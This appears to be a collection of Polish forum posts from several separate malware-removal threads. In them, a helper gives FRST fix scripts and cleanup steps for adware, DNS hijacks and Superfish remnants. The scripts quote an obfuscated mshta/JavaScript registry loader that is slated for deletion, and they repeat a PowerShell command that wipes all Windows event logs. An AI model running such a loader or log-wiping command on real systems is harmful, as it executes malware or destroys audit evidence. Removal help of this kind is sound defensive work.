Miszel03

Tak, przygotowałem skrypt (gdyż przy okazji znowu wyczyszczę Dziennik Zdarzeń, żeby nie widniał tam ten nieaktualny błąd). 

1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść:

S2 U3sHlpDr; C:\Windows\SysWOW64\Drivers\U3sHlpDr.sys [7423 2018-02-10] () [brak podpisu cyfrowego]
C:\Windows\SysWOW64\Drivers\U3sHlpDr.sys
S0 MBAMSwissArmy; System32\Drivers\mbamswissarmy.sys [X]
Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}
Reboot:

2. Na koniec zastosuj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne jak i system Windows.

Robiłem już skany Malwarebytes, adwcleaner, avast ale nic to nie dało.

Co oznacza sformułowanie "nic to nie dało"? Czy zostały wykryte jakieś zagrożenia? Jeśli tak to proszę dostarczyć z tego raport. 

Dodaje utworzone pliki FRST i Addition oraz wyświetlany komunikat.

Brakuje raportu Shortcut, więc będę go wymagał w następnym poście.

Wydaję mi się, że poniższe elementy to infekcja:

Startup: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JDSound.lnk [2018-02-13]
ShortcutTarget: JDSound.lnk -> C:\Users\Adam\AppData\Roaming\appmr\JDSound.vbs ()
2018-02-13 15:06 - 2018-02-13 16:01 - 000000000 ____D C:\Users\Adam\AppData\Roaming\vbhost
2018-02-13 15:06 - 2018-02-13 15:06 - 000000000 ____D C:\Users\Adam\AppData\Roaming\appmr

...gdyż:

     - data utworzenia jest wczorajsza,

     - nie mogę powiązać tych komponentów z żadnym poprawnym, zainstalowanym oprogramowaniem, 

     - nazwy folderów wyglądają podejrzanie. 

Czy może znasz te wpisy? W skrypcie odbędzie się ich kasacja, a oprócz tego sprzątanie szczątek po wcześniej odinstalowanym oprogramowaniu (m.in po Mozilla FireFox), a także kasacja martwych wpisów itd. 

Akcja:

1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik tekstowy. Wklej do pliku następującą treść:

CloseProcesses:

CreateRestorePoint:
CustomCLSID: HKU\S-1-5-21-3636725091-2947975232-529749042-1002_Classes\CLSID\{162C6FB5-44D3-435B-903D-E613FA093FB5}\InprocServer32 -> C:\Users\Adam\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\amd64\FileCoAuthLib64.dll => Brak pliku
Task: {0B420E43-ABE8-4D21-B427-69F70240C3AA} - \Microsoft\Windows\Setup\EOSNotify -> Brak pliku 
Task: {D5EDEC38-D37C-4B04-9401-DE378129ACC1} - System32\Tasks\CreateChoiceProcessTask => C:\Windows\BrowserChoice\browserchoice.exe
Startup: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JDSound.lnk [2018-02-13]
ShortcutTarget: JDSound.lnk -> C:\Users\Adam\AppData\Roaming\appmr\JDSound.vbs ()
C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JDSound.lnk
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia 
SearchScopes: HKU\S-1-5-21-3636725091-2947975232-529749042-1002 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-21-3636725091-2947975232-529749042-1002 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-21-3636725091-2947975232-529749042-1002 -> {C0C3A6C6-03BC-4195-8FCB-AEA091301353} URL = hxxps://pl.search.yahoo.com/yhs/search?hspart=lvs&hsimp=yhs-awc&type=lvs__webcompa__1_0__ya__ch_WCYID10181_1355_171108__yaie&p={searchTerms}
S3 intaud_WaveExtensible; \SystemRoot\system32\drivers\intelaud.sys [X]
S3 iwdbus; \SystemRoot\System32\drivers\iwdbus.sys [X]
2018-02-13 15:06 - 2018-02-13 16:01 - 000000000 ____D C:\Users\Adam\AppData\Roaming\vbhost
2018-02-13 15:06 - 2018-02-13 15:06 - 000000000 ____D C:\Users\Adam\AppData\Roaming\appmr
DeleteKey: HKCU\Software\Mozilla
DeleteKey: HKCU\Software\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Mozilla
DeleteKey: HKLM\SOFTWARE\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla
DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org
DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins
C:\Users\Adam\AppData\Local\Mozilla
C:\Users\Adam\AppData\Roaming\Mozilla
C:\Users\Adam\AppData\Roaming\Profiles
Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}
EmptyTemp:

Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

2. Przeskanuj system za pomocą HitmanPro. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 

3. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i koniecznie Shortcut. Dołącz też plik fixlog.txt.

Zanim odpowiedziałeś mi na post zaobserwowałam, że Avira "sama" się wyłącza. Dlatego odinstalowałam Malwarebytes, bo mogło się zdarzyć, że jest jakiś konflikt. Jednak prawdopodobnie coś nie zagrało w ustawieniach Aviry i był problem z updatem, przez co ochrona się wyłączała. Muszę to jeszcze dokładnie obejrzeć, bo tak nie powinno być.

Nie wykluczony konflikt obu programów. 

Edit: MBAM wykrył zagrożenia po updacie Lenovo (skanowanie Avirą i Kasperskym było przed updatem) - może nowa detekcja z tym ma związek?

Czy ja prosiłem o użycie skanera Kasperskiego?! Proszę wykonywać moje instrukcję. 

Teraz widzę, że Malwarebytes odizolował wszystko z ostatniego skanu w kwarantannie (możesz ją opróżnić i odinstalować program).

Wcześniejsze zagrożenia nie zostały odizolowane, w momencie, w którym dostałem raport, stąd moje polecenie by te zagrożenia usunąć. 

Proszę teraz o komplet raportów FRST w celu oceny sytuacji.

Bardzo mi miło, że mogłem pomóc. 

Na koniec zastosuj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne jak i system Windows.

1. Zagrożenia wykryte przez Malwarebytes daj do kasacji.

2. Przez SHIFT + DELETE skasuj poniższe foldery szczątkowe po przeterminowanym SpyBot:

C:\ProgramData\Spybot - Search & Destroy

C:\Program Files (x86)Spybot - Search & Destroy 2

3. Napisz jak podsumowujesz obecną sytuację, czy problem, z którym się do nas zgłosiłeś ustąpił? 

Niezły bałagan, m.in infekcja DNS z poziomu systemu (ustawione adresy są zagraniczne, często widziane tu jako infekcyjne - KLIK / KLIK), zarażone przez adware przeglądarki (w tym wspominany przez Ciebie uciążliwy Safefinder), infekcja Albireo.

P.S: Widzę tutaj również crack KMS, który kojarzony jest z lewym aktywatorem pakietu Office - nie ruszam go, zdejmuję tylko jego blokady typu Debbuger. Pod ocenę indywidualną zostawiam co z nim zrobisz (choć nie wiadomo co w nim jest).

I przy okazji: resetuje również plik Hosts (są tam modyfikacje chyba też aktywatora licencji, ale nie jestem pewien - jeśli nie życzysz sobie tego to usuń ze skryptu linijkę Hosts:)

Portale z oprogramowaniem / Instalatory - na co uważać

Dezynfekcja:

1. Start > Panel Sterowania > System i zabezpieczenia > System > Z bocznego panelu wybierz Ochrona systemu > Sekcja Ustawienia ochrony > Wybierz dysk C > Kliknij Konfiguruj > Sekcja Przywróć Ustawienia > Zmień z Wyłącz ochronę systemu na Przywróć ustawienia systemu oraz poprzednie wersje plików > kliknij Zastosuj, a następnie OK.

2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść:

CloseProcesses:
CreateRestorePoint:
C:\Users\pklos\Documents\INTERsoft\ArCADia-START\6.5 PL\Print Styles\Create a Print Style Table.lnk 
C:\Users\pklos\Desktop\Auslogics DiskDefrag.lnk 
Task: {27D13405-9702-4343-A295-DC4497BCFA05} - \Microsoft\Windows\UNP\RunCampaignManager -> Brak pliku 
HKLM\...\Run: [sERVICE] => [X]
HKLM\...\RunOnce: [x4zzmy5u5ag] => C:\Program Files (x86)\ccc\ccc.exe [670208 2018-02-11] ()
HKLM\...\RunOnce: [pqgyl4fam1f] => C:\Program Files (x86)\ccc\ccc.exe [670208 2018-02-11] ()
C:\Program Files (x86)\ccc
HKU\S-1-5-21-1307399746-3321642949-2734818087-1001\...\Policies\Explorer: [] 
AppInit_DLLs: C:\ProgramData\Quoteex\Dripranfix.dll => Brak pliku
AppInit_DLLs-x32: C:\ProgramData\Quoteex\Driptech.dll => Brak pliku
C:\ProgramData\Quoteex
IFEO\OSppSvc.exe: [Debugger] KMS-R@1nHook.exe
IFEO\SppExtComObj.exe: [Debugger] KMS-R@1nHook.exe
BootExecute: autocheck autochk * sdnclean64.exe
GroupPolicy: Ograniczenia - Chrome 
HKU\S-1-5-21-1307399746-3321642949-2734818087-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia 
HKU\S-1-5-21-1307399746-3321642949-2734818087-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccYrAlKCo1kNn6F9vcF55hOQj6P9k6WrOGoLccoB77SOD-E_nl2Ja0e9z4E-Qq7umdnTrL2pKx7ADSs5fDKilpQ7nI8Q25B1bt_NZg30rpdle0ZkmtmGbGvA5MPWKWXvnZmv6g887a8EvGLsc9RoH_gzqAijFw,,&q={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope - brak wartości
FF NewTab: Mozilla\Firefox\Profiles\34v2zedf.default -> C:\\ProgramData\\Quoteexs\\ff.NT
CHR StartupUrls: Default -> "hxxps://search.safefinder.com/?st=sc&q="
S1 elauxnoe; \??\C:\WINDOWS\system32\drivers\elauxnoe.sys [X]
S1 fndzutse; \??\C:\WINDOWS\system32\drivers\fndzutse.sys [X]
2018-02-11 22:55 - 2018-02-11 22:55 - 007576064 _____ () C:\Users\pklos\AppData\Local\agent.dat
2018-02-11 22:55 - 2018-02-11 22:55 - 000070896 _____ () C:\Users\pklos\AppData\Local\Config.xml
2018-02-11 22:55 - 2018-02-11 22:55 - 000140800 _____ () C:\Users\pklos\AppData\Local\installer.dat
2018-02-11 22:55 - 2018-02-11 22:55 - 000005568 _____ () C:\Users\pklos\AppData\Local\md.xml
2018-02-11 22:55 - 2018-02-11 22:55 - 000126464 _____ () C:\Users\pklos\AppData\Local\noah.dat
2018-02-11 22:55 - 2018-02-11 22:55 - 000278509 _____ () C:\Users\pklos\AppData\Local\Rankronstring.tst
2018-02-11 22:55 - 2018-02-11 22:55 - 001983026 _____ () C:\Users\pklos\AppData\Local\Subhome.tst
Tcpip\..\Interfaces\{2cc371c0-e1e4-4191-ad71-68a0ab659df2}: [NameServer] 82.163.142.8,95.211.158.136
Tcpip\..\Interfaces\{6997474f-c083-4230-bc4d-cdf004e68961}: [NameServer] 82.163.142.8,95.211.158.136
CMD: ipconfig /flushdns
VirusTotal: C:\Program Files (x86)\Windows Kits\10\Testing\Runtimes\TAEF\Wex.Services.exe
CMD: dir /a "C:\Program Files"
CMD: dir /a "C:\Program Files (x86)"
CMD: dir /a "C:\Program Files\Common Files\System"
CMD: dir /a "C:\Program Files (x86)\Common Files\System"
CMD: dir /a C:\ProgramData
CMD: dir /a C:\Users\pklos\AppData\Local
CMD: dir /a C:\Users\pklos\AppData\LocalLow
CMD: dir /a C:\Users\pklos\AppData\Roaming
Hosts:
Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}
EmptyTemp:

Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

3. Wyczyść i zabezpiecz przeglądarkę Google Chrome:

• Zresetuj synchronizację (o ile włączona): KLIK.
• Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia.
• Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone.
• Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google (widoczny SafeFinder został skasowany w skrypcie).

• Odłącz synchronizację (o ile włączona): KLIK.
• Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone.
• Menu Historia > Wyczyść historię przeglądania.

6. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

Na PW zgłosiłeś, że dałeś poprawne logi i że temat jest aktualny, więc odpowiadam.

W raportach widoczne nieporządne instalacje i zanieczyszczony przez adware / PUP plik Hosts. Tym się teraz będzie zajmować, a przy okazji posprzątam system z resztek po oprogramowaniu. 

1. Start > Panel Sterowania > System i zabezpieczenia > System > Z bocznego panelu wybierz Ochrona systemu > Sekcja Ustawienia ochrony > Wybierz dysk C > Kliknij Konfiguruj > Sekcja Przywróć Ustawienia > Zmień z Wyłącz ochronę systemu na Przywróć ustawienia systemu oraz poprzednie wersje plików > kliknij Zastosuj, a następnie OK.

2. Przez Panel Sterownia odinstaluj:

• wątpliwe / fałszywe oprogramowanie zabezpieczające: ByteFence Anti-Malware.
• adware / PUP: WarThunder (fałszywa instalacja, nie myl z oryginalną). 

CloseProcesses:
CreateRestorePoint:
CustomCLSID: HKU\S-1-5-21-2441937318-2594584175-3204281650-1000_Classes\CLSID\{0E270DAA-1BE6-48F2-AC49-5B4B93E820CD}\InprocServer32 -> %%systemroot%%\system32\shell32.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-2441937318-2594584175-3204281650-1000_Classes\CLSID\{144DF3B2-2402-47AE-9583-5A045929A8D4}\InprocServer32 -> C:\Users\Seba\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-2441937318-2594584175-3204281650-1000_Classes\CLSID\{8C46158B-D978-483C-A312-16EE5013BE04}\InprocServer32 -> C:\Users\Seba\AppData\Local\Google\Update\1.3.33.3\psuser_64.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-2441937318-2594584175-3204281650-1000_Classes\CLSID\{CB492AF1-2CEF-4E58-BE47-471C77D0C8BA}\InprocServer32 -> C:\Users\Seba\AppData\Local\Google\Update\1.3.32.7\psuser_64.dll => Brak pliku
ContextMenuHandlers3: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> Brak pliku
ContextMenuHandlers5: [Gadgets] -> {6B9228DA-9C15-419e-856C-19E768A13BDC} =>  -> Brak pliku
Task: {1B1D7347-1562-467A-9B52-400FF969E2C0} - System32\Tasks\{70C1515F-9C50-4BF6-A02F-A7169283EE48} => C:\Windows\system32\pcalua.exe -a "D:\rmst\Assassins.Creed.Revelations.v1.01.Update-SKIDROW [ALEX]\ac_revelations_1.01_eu.exe" -d "D:\rmst\Assassins.Creed.Revelations.v1.01.Update-SKIDROW [ALEX]"
Task: {37E5AA98-927C-4736-A81E-6A9A683725D8} - System32\Tasks\{DA1D2933-A880-4746-AE32-900142AEC99F} => C:\Windows\system32\pcalua.exe -a C:\PROGRA~2\Google\GOOGLE~1\SketchUp.exe -c "C:\Users\Seba\Dysk Google\PIAST roboczy\PIAST model6_1.skp"
Task: {52EC1669-87A7-415F-9784-BC14B59E70B2} - \CCleanerSkipUAC -> Brak pliku 
Task: {CE621AAF-89B2-4B45-9DC9-D862C5ED5528} - \Microsoft\Windows\UNP\RunCampaignManager -> Brak pliku 
C:\Users\Seba\Desktop\WarThunder.lnk
C:\Users\Seba\Desktop\Kontynuuj instalację Microsoft Word 2016.lnk
Hosts:
Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}
EmptyTemp:

Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

4. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 

5. Zrób nowy log FRST (za pomocą najnowszej wersji!) z opcji Skanuj (Scan) wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

Reinstalacja Windowsa może pomóc?

To zależy co masz na myśli przez "może pomóc". Z pewnością zagwarantuje czysty system operacyjny.  

Update: konto steam zostało skradzione i zbanowane. Bardziej jednak zależy mi na koncie mail. Dodać aktualniejsze logi? Mógłbym prosić sprawdzenie ich jak najszybciej?

Konto elektronicznej skrzynki pocztowej będzie raczej nie do odzyskania. Incydent możesz zgłosić na policję, co zwiększy zakres rozmowy z administratorem usługi.

Raporty nie wykazują oznak infekcji. 

Na wszelki wypadek wykonaj jeszcze skan za pomocą HitmanPro i pokaż ewentualny wyniki. 

Sprawy poboczne zamykam do spoilera.

C:\Windows\system32\User32.dll
[2017-08-02 17:58] - [2016-11-10 17:32] - 001008640 _____ (Microsoft Corporation) E573BD9AB55C8E333C202B9E255F972E
 
C:\Windows\SysWOW64\User32.dll
[2017-12-22 17:30] - [2017-12-22 17:30] - 000833024 _____ (Microsoft Corporation) 2C9CC9F492CA596B1B9FC1AE5E916356

AV: 360 Total Security (Disabled - Up to date) {0371CA44-3F80-A1D3-BECE-910620B58D50}


AS: 360 Total Security (Disabled - Up to date) {B8102BA0-19BA-AE5D-847E-AA745B32C7ED}

Nie wiem czy dobrze zrobiłam, ale skorzystałam z narzędzia Lenovo do usuwania Superfisha.

Proszę wykonywać moje zalecenia jeden do jednego. Inaczej zaczną się problemy.

Usunęłam z kwarantanny w Avirze i w Malwarebytes wszystko co w nich było.

W przypadku Aviry tak - o to chodziło, ale w przypadku MBAM nie zostały podjęte żadne akcje (więc teraz powtórzyć skan i użyć opcji Usuń).

Po tych akacjach znowu nowy zestaw raportów FRST, gdyż ten będzie nieaktualny.

Wszystko pomyślnie wykonane. Infekcja zdjęta. 

Zastanawia mnie tylko sterownik U3sHlpDr, gdyż:

     - widoczny brak podpisu cyfrowego, 

     - data utworzenia zbiega się z czasem infekcji, 

     - sterownik sypię błędami w Dzienniku Zdarzeń. 

lecz żaden z silników na VirusTotal nie wykrywa go jako zagrożenie, a po za tym oznaczony jest jako sterownik INTEL (choć nie widzę jego śladów). 

Skonsultuje to z picasso i dam znać. Napisz czy problemy, z którymi się do nas zgłaszałeś ustały.

Ta usługa jest w porządku.

Jestem już po konsultacji z picasso. 

Ratunkiem może okazać się ostatnia kopia RegBack: 

LastRegBack: 2017-09-10 01:33

lecz niestety jest ona całkiem stara. Po przywróceniu wystąpią różne niezgodności (np. przywrócenie odinstalowanych programów w rejestrze), a nie wykluczam również gorszych efektów. 

Wydaję mi się, że oprócz tego przypadek kwalifikuję się również do reperacji nakładkowej.

Powiedz na co się decydujesz, ale tak jak mówię: nie wiem jaki jest zakres zniszczeń, nie wiadomo również jak do końca zachowa się system po przywróceniu kopii.

Najlepszą opcją jest skopiowanie najważniejszych danych na nośnik zewnętrzny i reinstalacja systemu, co da najlepszy rezultat. 

Zdecydowana większość detekcji MBAM dotyczy PUP.Optional.VisualDiscovery, a to tzw. adware SuperFish ładowane domyślnie do sprzętów Lenovo.

Reszta tj. mówiłem tylko drobne szczątki po adware.

Detekcje Aviry zaś dotyczą praktycznie tego samego.

Całość do kasacji i zrób końcowy zestaw raportów (FRST, Addition, Shortcut).

Wszystko pomyślnie wykonane.

Pokaż mi jeszcze logi z Malwarebytes i Aviry ze skanowania, o które prosiłem, bym mógł przejść do ostatecznych doczyszczeń i finalizacji. 

3. Zrobiłem tak jak poleciłeś, ale żadnego restartu systemu nie było.

Drobna pomyłka z mojej strony, restartu nie powinno być.

Usługa Windows Audio na pierwszy rzut oka wygląda w porządku (poszerzymy diagnostykę), poprosiłem już picasso, aby rzuciła okiem na temat - wiem, że kiedyś rozwiązywała już podobny przypadek, a to bez wątpienia najlepszy fachowiec. 

Kolejny pobór danych i akcje:

1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik tekstowy o losowej nazwie. Wklej do pliku następującą treść:

Reg: reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AudioSrv\Parameters" /s
Reg: reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AudioSrv\Enum" /s

Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania.  W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Przedstaw go.

2. Niedziałające programy póki co sugeruję po prostu reinstalować. Tutaj jest pewnie szereg uszkodzeń, który trzeba będzie odtworzyć.

Czy wyświetlają się jakieś konkretne błędy? 

Baidu nie dał się odinstalować żadnym cywilizowanym sposobem. Dopiero gdy go zainstalowałam ponownie i odinstalowałam zniknął z zapisów. Mam nadzieję, że nie pozostał żaden "tajniak".

Nie i to jest rekomendowany sposób. Miałem go zalecić w razie niepowodzenia, ale widzę, że już mnie wyręczyłaś.

Mam jeszcze wątpliwości co do 2-ch programów:

1. Advanced Registry Care Pro v2.0

2. CCleaner

Pierwszego w ogóle nie znam, wnioskować mogę tylko o tyle ile mogę uzyskać z Googla. Czy niezbyt zorientowany użytkownik nie zrobi sobie nimi kuku?

Czy Waszym zdaniem są to potrzebne programy?

CCleaner (instalacja działa?) to z pewnością autentyczne oprogramowanie, choć ostatnia afera związana z malware w instalatorze budzi pewny niepokój. 

Komentując zaś Advanced Registry Care Pro v2.0 to jest to raczej aplikacja o typie choinkowym, ale nie wygląda mi to na adware / PUP.

Oba programy są nierekomendowane przez nas zespół, gdyż: 

     - analiza wyników "czyścicieli" musi podlegać weryfikacji, niejednokrotnie widziane tu są efekty zbyt pośpiesznego wybrania opcji Oczyść,

     - metoda czyszczenia szczególnie przeglądarek podlega dyskusji, wg mnie takie operacje powinny odbywać się wykorzystując autorski mechanizm przeglądarki. Integracja innym narzędziem to proszenie się o niepotrzebne usterki / konflikty.

Jeśli tam osoba nie używa tego oprogramowania to sugerowana deinstalacja.

Avira od razu w pierwszym skanie wykryła 2 malware'y, a dziś zameldowała:

 

The pattern of 'ADWARE/ELEXgkqic [adware] detected in file 'C:\Users\l_canon dodatki system ok 2\yet_another_cleaner_sk.exe. Action performed: Movie file to quarantaine

Dzisiejsza detekcja do kasacji. To instalator fałszywego skanera jakim jest YAC. Ale to raczej nie groźne, bo to zwykły instalator, którego nie wykonano. 

Edit: Avira wykryła 6 zagrożeń, ostatnie: ADWARE/Visucius.65 + PUA/OpenCandy.Gen x 2

Nadal skanuje. Prześlę raport.

To pewnie "witaminki". Czyli drobne ślady po adware / PUP.

Na koniec skanowania proszę dostarczyć wyniki wraz ze ścieżkami do plików i nic nie usuwać - wyniki trzeba zweryfikować. 

I przypominam o pkt. 5 na koniec wszystkich działań.

Miło mi to słyszeć.

W takim razie temat zamykam.

Dziękuję. Temat do zamknięcia.

Miło mi, że mogłem pomóc.

Zamykam.

Kliknij PPM na pulpicie. Wybierz zakładkę Personalizuj po czym w lewym dolnym rogu kliknij Ekran, następnie w lewym górnym rogu wybierz "Kalibruj kolor".

Postępuj zgodnie z dialogiem i dostosuj ustawienia. 

Akcja pomyślnie wykonana. 

Na koniec zastosuj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne jak i system Windows.

Poniżej drobne wyjaśnienia (bo widzę, że jego oczekujesz).

Ustawione proxy było następujące:

ProxyServer: [s-1-5-21-3412699975-1278123406-526146009-1000] => 10.0.5.99:80

Plik Hosts został zmodyfikowany całkiem dawno i to wygląda na starą modyfikację infekcji adware / PUP (widoczne są hosty tego typu infekcji):

==================== Hosts - zawartość: ==========================

 

(Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.)
 

2009-07-14 03:34 - 2016-04-23 09:53 - 000001993 _____ C:\Windows\system32\Drivers\etc\hosts
 

0.0.0.0 0.0.0.0 # fix for traceroute and netstat display anomaly

0.0.0.0 tracking.opencandy.com.s3.amazonaws.com

0.0.0.0 media.opencandy.com

0.0.0.0 cdn.opencandy.com

0.0.0.0 tracking.opencandy.com

0.0.0.0 api.opencandy.com

0.0.0.0 installer.betterinstaller.com

0.0.0.0 installer.filebulldog.com

0.0.0.0 d3oxtn1x3b8d7i.cloudfront.net

0.0.0.0 inno.bisrv.com

0.0.0.0 nsis.bisrv.com

0.0.0.0 cdn.file2desktop.com

0.0.0.0 cdn.goateastcach.us

0.0.0.0 cdn.guttastatdk.us

0.0.0.0 cdn.inskinmedia.com

0.0.0.0 cdn.insta.oibundles2.com

0.0.0.0 cdn.insta.playbryte.com

0.0.0.0 cdn.llogetfastcach.us

0.0.0.0 cdn.montiera.com

0.0.0.0 cdn.msdwnld.com

0.0.0.0 cdn.mypcbackup.com

0.0.0.0 cdn.ppdownload.com

0.0.0.0 cdn.riceateastcach.us

0.0.0.0 cdn.shyapotato.us

0.0.0.0 cdn.solimba.com

0.0.0.0 cdn.tuto4pc.com

0.0.0.0 cdn.appround.biz

0.0.0.0 cdn.bigspeedpro.com

0.0.0.0 cdn.bispd.com

0.0.0.0 cdn.bisrv.com

Ale jak mówię. Hosts już zresetowany do stanu domyślnego.

Ps. celowo nie mam antywira ze względu na to iż racjonalnie korzystam z internetu, jak widać inni użytkownicy mego komputera nie 

Jestem w stanie w to uwierzyć, bo system oprócz ostatnich wywijasów wygląda na czysty i "niezawalony". 

Mimo wszystko, dzisiejsze oprogramowanie antywirusowe wcale nie utrudnia korzystania z komputera i nie widzę powodu, dla którego nie miałbyś go używać. Proszę rozważyć instalację.

Widoczna jest jeszcze infekcja wykonywana z klucza. Przeprowadzimy dezynfekcję, a przy okazji posprzątam resztki po programach - m.in po przeglądarce Mozilla Firefox, a także martwe wpisy / skróty. 

1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść:

CloseProcesses:
CreateRestorePoint:
HKU\.DEFAULT\Software\Classes\7c7c: "C:\Windows\system32\mshta.exe" "javascript:B4aiH="jO";f4V3=new ActiveXObject("WScript.Shell");DGfa2RQ1="Wr5ul6";bOPA04=f4V3.RegRead("HKCU\\software\\wkxl\\pift");lku2oHlD="2";eval(bOPA04);eQ0yj4="2VWz";" 
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku
AlternateDataStreams: C:\ProgramData\TEMP:B755D674 [352]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
S4 xhunter1; \??\C:\Windows\xhunter1.sys [X]
C:\Users\Kamil\AppData\Roaming\VOS\HDDRegenerator\%Common StartMenu%\Programmi\HDD Regenerator\HDD Regenerator.lnk
C:\Users\Kamil\AppData\Roaming\VOS\HDDRegenerator\%Common StartMenu%\Programmi\HDD Regenerator\Readme.lnk
C:\Users\Kamil\AppData\Roaming\VOS\HDDRegenerator\%Common DesktopDirectory%\HDD Regenerator.lnk
DeleteKey: HKCU\Software\Mozilla
DeleteKey: HKCU\Software\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Mozilla
DeleteKey: HKLM\SOFTWARE\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla
DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org
DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins
C:\Users\Kamil\AppData\Local\Mozilla
C:\Users\Kamil\AppData\Roaming\Mozilla
C:\Users\Kamil\AppData\Roaming\Profiles
VirusTotal: C:\Windows\SysWOW64\Drivers\U3sHlpDr.sys
Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}
EmptyTemp:

Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

2. Ponów całościowy skan za pomocą Malwarebytes. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 

3. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

1. Jest zainstalowany Baidu Antivirus, który moim zdaniem przepuścił "niejedno". Niestety nie daje się odinstalować, brak go w spisie programów, ale jest z pewnością. Wycięcie go w trybie awaryjnym oczywiście można zrobić, ale to działanie nieco barbarzyńskie i niekoniecznie korzystne dla systemu.

 

2. Zainstalowałam u niej mimo to Avirę, która już wykryła malware'y, więc infekcja raczej istnieje

Baidu - marka związana z kontrowersjami i stosująca bardzo agresywną taktykę marketingową znacznie wykraczającą poza akceptowalny poziom.

Wiele inwazyjnych produktów z tej stajni jest instalowane metodami "PUP". Multum tematów tu na forum zgłaszający "infekcje" tym produktem i niemożnością pozbycia się go. 

Reasumując: zmiana antywirusa była krokiem jak najbardziej pożądanym.

Proszę jeszcze zauważyć, że zainstalowany na tym komputerze Maxthon Cloud Browser (ustawiony jako domyślna przeglądarka) jest związany z aferą dot. śledzenia użytkowników. 

